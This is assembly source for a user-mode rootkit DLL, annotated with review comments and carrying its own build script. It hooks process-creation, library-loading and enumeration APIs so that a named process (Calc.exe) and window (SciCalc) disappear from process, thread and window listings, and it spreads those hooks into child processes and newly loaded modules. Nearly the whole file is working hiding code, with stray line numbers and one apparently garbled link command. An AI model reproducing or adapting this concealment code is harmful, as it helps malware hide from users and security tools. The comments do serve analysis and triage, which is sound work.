
;@GOTO TRANSLATE
; Invisible.bat -- MASM source that doubles as its own build script.
; Line 1 is read by cmd.exe as "@GOTO TRANSLATE" (';' is a separator for
; the batch parser but a comment for ML), jumping to the :TRANSLATE label
; after the END directive, where ML and eLINK are invoked on this file.
; Keep ";@GOTO TRANSLATE" as the very first line for that to work.
;
; Syntax: MASM (Intel operand order), .586P, 32-bit FLAT model, STDCALL,
; case-sensitive symbols (OPTION CASEMAP: NONE). The iWin32/iWin32i/
; iWin32j/sWin32/PUSHp/POPc/TEXTA/MkHook macros used below are not
; defined in this file; presumably they come from APIMACRO.mac and
; ApiHooks.inc -- check there for their exact push order and clobbers.

.586P

.MODEL            FLAT, STDCALL

   OPTION         CASEMAP: NONE
   INCLUDE        WINDOWS.inc
   UNICODE        = FALSE
   INCLUDE        APIMACRO.mac

   INCLUDE        ApiHooks.inc

   INCLUDELIB     iKERNEL32.lib
   INCLUDELIB     iUSER32.lib

   INCLUDELIB     iApiHooks.lib
  18.  
  19. ;------------------------------------------------------------------
.DATA?
   ; Uninitialised globals shared by every hook handler below. Because
   ; stinfo/prinfo/OrigEnumWinProc are single global slots, the handlers
   ; that use them are not re-entrant and race if two threads hook at once.
   CurPID                   DWORD  ?   ; PID of the process this DLL lives in (set in DllMain)
   OrigEnumWinProc          DWORD  ?   ; caller's EnumWindows callback while NewEnumWindows is active, else NULL
   prinfo     PROCESS_INFORMATION  <>  ; scratch PROCESS_INFORMATION for NewLoadModule / NewWinExec
   stinfo     STARTUPINFO          <>  ; scratch STARTUPINFO; cb is filled in DllMain
   PathHooks  SIGN  MAX_PATH DUP   (?) ; this DLL's own path (GetModuleFileName in DllMain), handed to EstablishApiHooksA


   ; Parameter block received by LoadModule as its second argument;
   ; NewLoadModule reads lpEnvAddress, lpCmdLine and lpCmdShow from it.
   ; NOTE(review): layout assumed to match the SDK's LOADPARMS32 -- confirm.
   LOADPARMS32 STRUCT
    lpEnvAddress LPSTR ?
    lpCmdLine    LPSTR ?
    lpCmdShow    LPSTR ?
    dwReserved   DWORD ?
   LOADPARMS32 ENDS
  34.  
.CODE
   ALIGN    4
   ; One API_HOOK slot marked HOOKS_DYNAMIC placed directly in front of the
   ; hook table. PrepareDynamic starts walking at OFFSET DynaHooks + API_HOOK
   ; (i.e. the first real entry), and the LoadLibrary hooks pass OFFSET
   ; DynaHooks to EstablishApiHooksA when re-hooking.
   DynaHooks  API_HOOK <HOOKS_DYNAMIC>
   ; Hook table, exported as "Invisible" (see /EXPORT in :TRANSLATE).
   ; Each MkHook line names the API to intercept; the matching New<Api>
   ; handler is defined further down. The module column is empty for the
   ; KERNEL32 APIs and USER32 for the two window APIs. Everything after
   ; the ';' on each line (", HOOK_ALL+HOOK_HARD") is a comment, so the
   ; macro's default flags are in effect for every entry.
   BeginHooks Invisible
   MkHook    ,      , CreateProcessA;, HOOK_ALL+HOOK_HARD
   MkHook    ,      , LoadModule;,     HOOK_ALL+HOOK_HARD
   MkHook    ,      , WinExec;,        HOOK_ALL+HOOK_HARD
   MkHook    ,      , LoadLibraryA;,   HOOK_ALL+HOOK_HARD
   MkHook    ,      , LoadLibraryExA;, HOOK_ALL+HOOK_HARD
   MkHook    ,      , GetProcAddress;, HOOK_ALL+HOOK_HARD

   MkHook    ,      , Process32Next;,  HOOK_ALL+HOOK_HARD
   MkHook    ,      , Thread32Next;,   HOOK_ALL+HOOK_HARD
   MkHook    ,USER32, EnumWindows;,    HOOK_ALL+HOOK_HARD
   MkHook    ,USER32, GetWindow;,      HOOK_ALL+HOOK_HARD
  NoHooks = ($-Invisible)/API_HOOK     ; number of entries = table bytes / entry size
   EndHooks

   ; NUL-terminated ANSI strings (the "/0" suffix presumably appends the
   ; terminator) used as module and API names; the s<Name> symbols are
   ; also what NewGetProcAddress compares lookups against.
   TEXTA      KERNEL32,                 <KERNEL32.dll/0>
   TEXTA      USER32,                   <USER32.dll/0>
   TEXTA      CreateProcessA,           <CreateProcessA/0> 
   TEXTA      LoadModule,               <LoadModule/0> 
   TEXTA      WinExec,                  <WinExec/0> 
   TEXTA      LoadLibraryA,             <LoadLibraryA/0> 
   TEXTA      LoadLibraryExA,           <LoadLibraryExA/0> 
   TEXTA      GetProcAddress,           <GetProcAddress/0> 

   TEXTA      Process32Next,            <Process32Next/0>
   TEXTA      Thread32Next,             <Thread32Next/0>
   TEXTA      EnumWindows,              <EnumWindows/0>
   TEXTA      GetWindow,                <GetWindow/0>

   ; What the handlers filter out: sProc2Hide is compared (case-insensitive)
   ; against the file-name part of PROCESSENTRY32.szExeFile; sWind2Hide is
   ; passed as the first (class name) argument of FindWindow.
   TEXTA      Proc2Hide,                <Calc.exe/0>
   TEXT       Wind2Hide,                <SciCalc/0>
  69.  
  70. ;------------------------------------------------------------------
  ; BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
  ; Written as a bare label, not a PROC, so there is no frame and the
  ; arguments are addressed from ESP: [ESP+4]=hinstDLL, [ESP+8]=fdwReason.
  ; On DLL_PROCESS_ATTACH it records the current PID (CurPID), sets
  ; stinfo.cb, and stores this DLL's own path in PathHooks, which the
  ; process-creation hooks later pass to EstablishApiHooksA. Every other
  ; reason falls straight through. Always returns TRUE; RETN 12 pops the
  ; three STDCALL arguments.
  DllMain:
   CMP        DWORD PTR [ESP+8], DLL_PROCESS_ATTACH
   JNE        @F
   iWin32     GetCurrentProcessId
   MOV        CurPID, EAX
   MOV        stinfo.cb, SIZEOF STARTUPINFO
   ; [ESP+12] presumably addresses the hinstDLL slot once the macro has
   ; pushed the two arguments to its right -- TODO confirm iWin32i's
   ; push order in APIMACRO.mac.
   iWin32i    GetModuleFileName, [ESP+12], OFFSET PathHooks, MAX_PATH
  @@:
   PUSH       TRUE
   POP        EAX                         ; EAX = TRUE without touching flags
   RETN       12    
  82.  
  83. ;Helper part-----------
  84. ;------------------------------------------------------------------
  ; Hook for CreateProcessA (same ten arguments). Forces CREATE_SUSPENDED
  ; into dwCreationFlags so the child cannot run before
  ; EstablishApiHooksA(PathHooks, child PID) has been applied to it, then
  ; resumes the primary thread unless the caller itself asked for
  ; CREATE_SUSPENDED. The real return value (EAX) is kept across the extra
  ; calls by PUSHp/POPc (presumably multi-register push/pop macros); on
  ; failure it falls straight through to RET with EAX = 0, untouched.
  ; The caller's lpProcessInformation is filled in by the real call and
  ; its handles are left open for the caller, as with CreateProcessA.
  NewCreateProcessA  PROC lpApplicationName, lpCommandLine,\
                          lpProcessAttributes, lpThreadAttributes,\
                          bInheritHandles, dwCreationFlags, \
                          lpEnvironment, lpCurrentDirectory,\
                          lpStartupInfo, lpProcessInformation
                     MOV  EAX, dwCreationFlags
                     OR   EAX, CREATE_SUSPENDED        ; child starts suspended
                     iWin32 CreateProcessA, lpApplicationName, lpCommandLine,\        
                                            lpProcessAttributes, lpThreadAttributes,\ 
                                            bInheritHandles, EAX,\       
                                            lpEnvironment, lpCurrentDirectory,\        
                                            lpStartupInfo, lpProcessInformation       
                     TEST  EAX, EAX
                     JE    @Failed                     ; pass the failure through unchanged
                     PUSHp EAX, EBX                    ; save return value; EBX is callee-saved
                     MOV   EBX, lpProcessInformation
                     ASSUME EBX: PTR PROCESS_INFORMATION
                     iWin32 EstablishApiHooksA, OFFSET PathHooks, [EBX].dwProcessId
                     TEST  dwCreationFlags, CREATE_SUSPENDED
                     JNE   @F                          ; caller wanted it suspended: leave it
                     iWin32 ResumeThread, [EBX].hThread
                    @@:
                     POPc  EAX, EBX
                    @Failed:
                     RET                    
  NewCreateProcessA  ENDP                   
  111. ;------------------------------------------------------------------
  ; Hook for LoadModule(lpModuleName, lpParameterBlock). Re-creates the
  ; call on top of CreateProcessA so the new process can be hooked while
  ; still suspended. From the LOADPARMS32 block: lpCmdShow must begin with
  ; the WORD 2, and the WORD after it becomes stinfo.wShowWindow; the first
  ; byte of lpCmdLine is skipped (presumably LoadModule's Pascal-style
  ; length byte), and a length byte of 0 yields a NULL command line.
  ; On a bad lpCmdShow or a CreateProcessA failure the PROC frame is torn
  ; down with LEAVE and control jumps to the real LoadModule (iWin32j,
  ; presumably a jump-to-import macro), so its own result reaches the
  ; caller. On success the prinfo handles are closed here and 32 (the
  ; first "success" value in LoadModule's convention) is returned.
  ; Uses the shared stinfo/prinfo globals -- not re-entrant.
  ; NOTE(review): stinfo.dwFlags never receives STARTF_USESHOWWINDOW, so
  ; the wShowWindow written here is presumably ignored -- confirm.
  NewLoadModule  PROC lpModuleName, lpParameterBlock
       MOV       EAX, lpParameterBlock
       ASSUME    EAX: PTR LOADPARMS32
       MOV       ECX, [EAX].lpCmdShow
       MOV       EDX, [EAX].lpCmdLine
       CMP       WORD PTR [ECX], 2
       JNE       @Fail                     ; unexpected show-command block: let the real API handle it
       MOV       CX, [ECX+2]
       CMP       BYTE PTR [EDX], 0         ; length byte of the command line
       MOV       stinfo.wShowWindow, CX    ; MOV keeps the flags from the CMP above
       MOV       ECX, 0
       JE        @F                        ; empty command line -> ECX = NULL
       LEA       ECX, [EDX+1]              ; else skip the length byte
      @@:
       iWin32    CreateProcessA, lpModuleName, ECX, \
                                 NULL, NULL, FALSE, CREATE_SUSPENDED,\
                                 [EAX].lpEnvAddress, NULL,\            
                                 OFFSET stinfo, OFFSET prinfo
       TEST      EAX, EAX
       JNE       @F
      @Fail:
       LEAVE                               ; drop our frame; caller's args/return address stay on the stack
       iWin32j   LoadModule
      @@:
       iWin32    EstablishApiHooksA, OFFSET PathHooks, prinfo.dwProcessId
       iWin32    CloseHandle, prinfo.hProcess
       iWin32    ResumeThread, prinfo.hThread
       iWin32    CloseHandle, prinfo.hThread
       MOV       EAX, 32
       RET
   NewLoadModule ENDP
  143. ;------------------------------------------------------------------
  ; Hook for WinExec(lpszCmdLine, fuCmdShow). Same scheme as NewLoadModule:
  ; the process is created with CreateProcessA + CREATE_SUSPENDED, hooked
  ; via EstablishApiHooksA, and only then resumed. The low word of
  ; fuCmdShow is copied to stinfo.wShowWindow. If CreateProcessA fails the
  ; frame is dropped (LEAVE) and control jumps to the real WinExec so its
  ; result reaches the caller; otherwise prinfo's handles are closed and
  ; 32 (WinExec's "greater than 31" success convention) is returned.
  ; Uses the shared stinfo/prinfo globals -- not re-entrant.
  ; NOTE(review): stinfo.dwFlags never receives STARTF_USESHOWWINDOW, so
  ; the wShowWindow written here is presumably ignored -- confirm.
  NewWinExec     PROC lpszCmdLine, fuCmdShow
       MOV       EAX, fuCmdShow
       MOV       stinfo.wShowWindow, AX
       iWin32    CreateProcessA, NULL, lpszCmdLine, \
                                 NULL, NULL, FALSE, CREATE_SUSPENDED,\
                                 NULL, NULL,\            
                                 OFFSET stinfo, OFFSET prinfo
       TEST      EAX, EAX
       JNE       @F
       LEAVE                               ; drop our frame before tail-jumping to the real API
       iWin32j   WinExec
      @@:
       iWin32    EstablishApiHooksA, OFFSET PathHooks, prinfo.dwProcessId
       iWin32    CloseHandle, prinfo.hProcess
       iWin32    ResumeThread, prinfo.hThread
       iWin32    CloseHandle, prinfo.hThread
       MOV       EAX, 32
       RET
   NewWinExec    ENDP
  163. ;------------------------------------------------------------------
  ; Hook for GetProcAddress(hLibrary, lpszProc). When a hooked API is
  ; looked up by name in KERNEL32, returns the address of the New<Api>
  ; handler instead of the real export, so code that resolves imports at
  ; run time is intercepted as well. Ordinal lookups (lpszProc < 10000H)
  ; and all other names go to the real GetProcAddress via LEAVE plus a
  ; tail jump, so its return value is passed through unchanged.
  NewGetProcAddress  PROC  hLibrary, lpszProc
                   CMP     lpszProc, 10000H
                   JB      @GoGPA                       ; ordinal, not a string: no match possible
                   iWin32  GetModuleHandleA, sKERNEL32
                   CMP     EAX, hLibrary
                   JNE     @GoUser32

        ; CmpApi NAME: if lpszProc equals sNAME (case-sensitive lstrcmp),
        ; set EAX to the address of NewNAME and return; otherwise fall
        ; through to the next comparison. Expands inline at each use.
        CmpApi     MACRO   __ApiNomen
                   iWin32  lstrcmp, lpszProc, s&__ApiNomen
                   TEST    EAX, EAX
                   JNE     @F
                   MOV     EAX, New&__ApiNomen
                   JMP     @RetGPA
                  @@:
                   ENDM

                   CmpApi  CreateProcessA
                   CmpApi  LoadModule
                   CmpApi  WinExec
                   CmpApi  LoadLibraryA
                   CmpApi  LoadLibraryExA
                   CmpApi  GetProcAddress
                   CmpApi  Process32Next
                   CmpApi  Thread32Next
                   JMP     @GoGPA                       ; KERNEL32 name we do not hook

                  @GoUser32:
                   ; NOTE(review): this branch queries sKERNEL32 again rather
                   ; than sUSER32 (which TEXTA defines but nothing references),
                   ; so it re-compares hLibrary against the handle that already
                   ; failed above and always takes the JNE. The two CmpApi
                   ; lines below are therefore effectively unreachable.
                   iWin32  GetModuleHandleA, sKERNEL32
                   CMP     EAX, hLibrary
                   JNE     @GoGPA
                   CmpApi  EnumWindows
                   CmpApi  GetWindow

                  @GoGPA:
                   LEAVE                                ; drop our frame; tail-jump to the real API
                   iWin32j GetProcAddress
                  @RetGPA:
                   RET
  NewGetProcAddress  ENDP
  203.  
  204. ;------------------------------------------------------------------
  ; PrepareDynamic(lpLibFileName): writes lpLibFileName into the
  ; ModuleImport field of each of the NoHooks entries of the hook table.
  ; EDX starts one API_HOOK before the table (OFFSET DynaHooks) and is
  ; pre-incremented, so DynaHooks itself is not modified. Does nothing
  ; when NoHooks is 0. Presumably this makes the following
  ; EstablishApiHooksA(OFFSET DynaHooks, ...) apply the hooks to the
  ; freshly loaded module's imports -- confirm against ApiHooks.inc.
  ; Clobbers EAX, ECX, EDX. Invoked with sWin32 (a local call, not an
  ; import) from the two LoadLibrary hooks.
  PrepareDynamic   PROC lpLibFileName
   MOV        EAX, lpLibFileName
   MOV        ECX, NoHooks
   JECXZ      Fin
   MOV        EDX, OFFSET DynaHooks ;Invisible - API_HOOK
  @@:
   ADD        EDX, API_HOOK               ; advance to the next entry first
   MOV        (API_HOOK PTR [EDX]).ModuleImport, EAX
   LOOP       @B                          ; ECX counts the remaining entries
  Fin:
   RET 
  PrepareDynamic   ENDP
  217. ;------------------------------------------------------------------
  ; Hook for LoadLibraryA(lpLibFileName). Loads the library with the real
  ; API and, if that succeeded, points every hook-table entry at
  ; lpLibFileName (PrepareDynamic) and re-runs EstablishApiHooksA against
  ; this process (CurPID) -- presumably so the newly loaded module's
  ; imports of the hooked APIs are patched too. The HMODULE is saved on
  ; the stack across those two calls and returned unchanged; on failure
  ; the 0 from LoadLibraryA is returned as-is.
  NewLoadLibraryA  PROC    lpLibFileName
                   iWin32  LoadLibraryA, lpLibFileName
                   TEST    EAX, EAX
                   JE      @F
                   PUSH    EAX                         ; keep the HMODULE
                   sWin32  PrepareDynamic, lpLibFileName
                   iWin32  EstablishApiHooksA, OFFSET DynaHooks, CurPID
                   POP     EAX
                  @@:
                   RET
  NewLoadLibraryA  ENDP
  229. ;------------------------------------------------------------------
  ; Hook for LoadLibraryExA(lpLibFileName, hFile, dwFlags). Same as
  ; NewLoadLibraryA, but skips the re-hooking when dwFlags is exactly
  ; DONT_RESOLVE_DLL_REFERENCES or exactly LOAD_LIBRARY_AS_DATAFILE
  ; (modules loaded that way do not execute code). Because these are
  ; equality tests rather than bit tests, a dwFlags value that combines
  ; either flag with other bits is still hooked. The HMODULE is preserved
  ; on the stack across the extra calls and returned unchanged.
  NewLoadLibraryExA PROC   lpLibFileName, hFile, dwFlags
                   iWin32  LoadLibraryExA, lpLibFileName, hFile, dwFlags
                   TEST    EAX, EAX
                   JE      @F
                   CMP     dwFlags, DONT_RESOLVE_DLL_REFERENCES
                   JE      @F
                   CMP     dwFlags, LOAD_LIBRARY_AS_DATAFILE
                   JE      @F
                   PUSH    EAX                         ; keep the HMODULE
                   sWin32  PrepareDynamic, lpLibFileName
                   iWin32  EstablishApiHooksA, OFFSET DynaHooks, CurPID
                   POP     EAX
                  @@:
                   RET
  NewLoadLibraryExA ENDP
  245. ;------------------------------------------------------------------
  246.  
  247. ;Executive part
   ; Hook for Process32Next(hSnapshot, lpProcEntry32). Calls the real
   ; Process32Next; when the returned entry's szExeFile, reduced to the
   ; part after its last '\', equals sProc2Hide (case-insensitive
   ; lstrcmpiA), it loops and fetches the next entry instead, so snapshot
   ; enumerators never see that process. Returns the real result; the
   ; TRUE value is saved on the stack across the string compare.
   ; NOTE(review): EDX is only assigned when a '\' is seen. For an
   ; szExeFile without a path separator, lstrcmpiA receives whatever the
   ; preceding Process32Next call left in EDX.
   NewProcess32Next PROC hSnapshot, lpProcEntry32
     Nochmals:
      iWin32     Process32Next, hSnapshot, lpProcEntry32
      TEST       EAX, EAX
      JE         Fin                           ; end of snapshot: pass FALSE through
      PUSH       EAX                           ; keep the TRUE return value
      MOV        EAX, lpProcEntry32
      ADD        EAX, PROCESSENTRY32.szExeFile ; EAX -> entry->szExeFile
    @@:
      ; scan to the terminating NUL, remembering the byte after each '\'
      CMP        BYTE PTR [EAX], 0
      JE     @F
      CMP     BYTE PTR [EAX], "\"
      JE     @Fond
      INC     EAX
      JMP     @B
    @Fond:
      INC     EAX
      MOV     EDX, EAX                         ; EDX = start of the component after this '\'
      JMP     @B
    @@:
      iWin32     lstrcmpiA, EDX, sProc2Hide
      TEST       EAX, EAX
      POP        EAX                           ; POP does not alter the flags from TEST
      JE         Nochmals                      ; name matched: drop this entry, fetch the next
    Fin:
      RET   
   NewProcess32Next ENDP
  275. ;--------------------------------------------------------------------------------
   ; Hook for Thread32Next(hSnapshot, lpThreadEntry32). After each real
   ; Thread32Next call, finds the window whose class is sWind2Hide; if it
   ; exists and the entry's th32OwnerProcessID equals the PID owning that
   ; window, the entry is skipped and the next one fetched. EBX carries
   ; the real return value (USES EBX saves/restores it around the body).
   ; The PID is obtained by passing ESP, which points at a pushed scratch
   ; DWORD, as GetWindowThreadProcessId's out-pointer and popping it back;
   ; this presumes the iWin32 macro pushes the ESP argument before EAX --
   ; TODO confirm the push order in APIMACRO.mac.
   NewThread32Next PROC USES EBX, hSnapshot, lpThreadEntry32
     Nochmals:
      iWin32     Thread32Next, hSnapshot, lpThreadEntry32
      TEST       EAX, EAX
      MOV        EBX, EAX                      ; MOV keeps the flags from TEST
      JE         Fin                           ; no more entries: return FALSE
      iWin32i    FindWindow, sWind2Hide, NULL
      TEST       EAX, EAX
      JE         Fin                           ; window not present: nothing to filter
      PUSH       ECX                           ; scratch DWORD that receives the PID
      iWin32     GetWindowThreadProcessId, EAX, ESP
      MOV        ECX, lpThreadEntry32
      POP        EAX                           ; EAX = PID owning the hidden window
      CMP        EAX, (THREADENTRY32 PTR [ECX]).th32OwnerProcessID
      JE         Nochmals                      ; thread belongs to that process: skip it
    Fin:
      MOV        EAX, EBX 
      RET   
   NewThread32Next ENDP
  295. ;--------------------------------------------------------------------------------
  ; Hook for EnumWindows(lpEnumFunc, lParam). Saves the caller's callback
  ; in OrigEnumWinProc and enumerates with NewEnumProc instead, which
  ; filters out the sWind2Hide window before forwarding each HWND to the
  ; saved callback. If OrigEnumWinProc is already set (a nested call from
  ; inside a callback) the request is passed through unfiltered, since
  ; there is only one global slot. That single slot also means concurrent
  ; EnumWindows calls from different threads race on it.
  NewEnumWindows PROC lpEnumFunc, lParam
   CMP        OrigEnumWinProc, NULL
   JE         @F
   iWin32     EnumWindows, lpEnumFunc, lParam       ; already active: plain pass-through
   RET
  @@:
   PUSH       lpEnumFunc 
   POP        OrigEnumWinProc                       ; memory-to-memory move via the stack
   iWin32     EnumWindows, NewEnumProc, lParam
   AND        OrigEnumWinProc, NULL                 ; clear the slot (AND with 0); EAX untouched
   RET
  NewEnumWindows ENDP
  308.  
  ; BOOL CALLBACK NewEnumProc(HWND hwnd, LPARAM lParam)
  ; Callback substituted by NewEnumWindows. If hwnd is the window whose
  ; class is sWind2Hide, returns TRUE without calling the caller's
  ; callback (enumeration continues, that window is simply never
  ; reported); otherwise calls through OrigEnumWinProc and returns its
  ; result. The JE after CMP relies on PUSH/POP leaving the flags intact.
  NewEnumProc PROC USES ESI, hwnd, lParam
   iWin32i    FindWindow, sWind2Hide, NULL
   TEST       EAX, EAX
   JE         OrigEnumP                             ; hidden window absent: forward as usual
   CMP        EAX, hwnd
   PUSH       TRUE
   POP        EAX                                   ; EAX = TRUE, flags from CMP preserved
   JE         @F                                    ; this is the hidden window: drop it
  OrigEnumP:
   sWin32     OrigEnumWinProc, hwnd, lParam         ; call through the saved callback pointer
  @@:
   RET
  NewEnumProc ENDP
  322. ;--------------------------------------------------------------------------------
  ; Hook for GetWindow(hWnd, uCmd). Keeps the sWind2Hide window out of
  ; window-relationship walks:
  ;  - hWnd is the hidden window and uCmd is GW_CHILD: return 0;
  ;  - hWnd is the hidden window otherwise: take one real GetWindow step
  ;    from it, make that result the new hWnd, and continue below;
  ;  - then GetWindow(hWnd, uCmd) is called for real, and as long as the
  ;    result is the hidden window (kept in EBX) another step is taken
  ;    from it, so the caller receives the window beyond it. A result of
  ;    0 is returned as-is.
  ; NOTE(review): when FindWindow fails, EBX is never assigned and still
  ; holds the caller's EBX (saved by USES EBX), so the CMP EAX, EBX at the
  ; bottom compares against an unrelated value on that path.
  NewGetWindow PROC  USES EBX, hWnd, uCmd
   iWin32i    FindWindow, sWind2Hide, NULL
   TEST       EAX, EAX
   JE         NotMe                                 ; nothing to hide
   MOV        EBX, EAX                              ; EBX = hidden window handle
   CMP        EAX, hWnd
   JNE        NotMe
   CMP        uCmd, GW_CHILD
   JNE        @F
   SUB        EAX, EAX                              ; EAX = 0: the hidden window reports no children
   RET
  @@:
   iWin32     GetWindow, EAX, uCmd                  ; step away from the hidden window itself
  Next:
   MOV        hWnd, EAX                             ; continue the walk from the window just found
  NotMe:
   iWin32     GetWindow, hWnd, uCmd
   TEST       EAX, EAX
   JE         Fin
   CMP        EAX, EBX
   JE         Next                                  ; landed on the hidden window: step past it
  Fin: 
   RET
  NewGetWindow ENDP
  347. ;------------------------------------------------------------------
  348.  
; Entry point is the bare DllMain label above. ML stops reading at END,
; so the batch commands that follow are never seen by the assembler.
END DllMain
  350.  
:TRANSLATE
@ECHO OFF
REM Build section, reached via the ";@GOTO TRANSLATE" on line 1 when this
REM file is run as a batch file. ML assembles this very file (everything
REM after END is ignored by the assembler), eLINK turns the object into
REM a DLL, and the intermediates are removed afterwards.
ML    /c /coff /nologo Invisible.bat
REM /EXPORT:Invisible,@1,NONAME exports the hook table by ordinal 1 only,
REM with no name; the two /MERGE options fold .rdata and .idata into
REM .text, so the resulting DLL has fewer sections than a default build
REM (a characteristic worth noting when triaging such a binary).
REM NOTE(review): "4086REM  /BASE:0X77240000" reads like a lost line break
REM or space before REM; as listed, everything on this line is part of
REM one eLINK command. Verify against the original file.
eLINK Invisible /nologo /DLL /EXPORT:Invisible,@1,NONAME /SUBSYSTEM:WINDOWS /MERGE:.rdata=.text /MERGE:.idata=.text /IGNORE:4078,4086REM  /BASE:0X77240000
DEL   Invisible.obj
DEL   Invisible.exp
DEL   Invisible.lib
pause
cls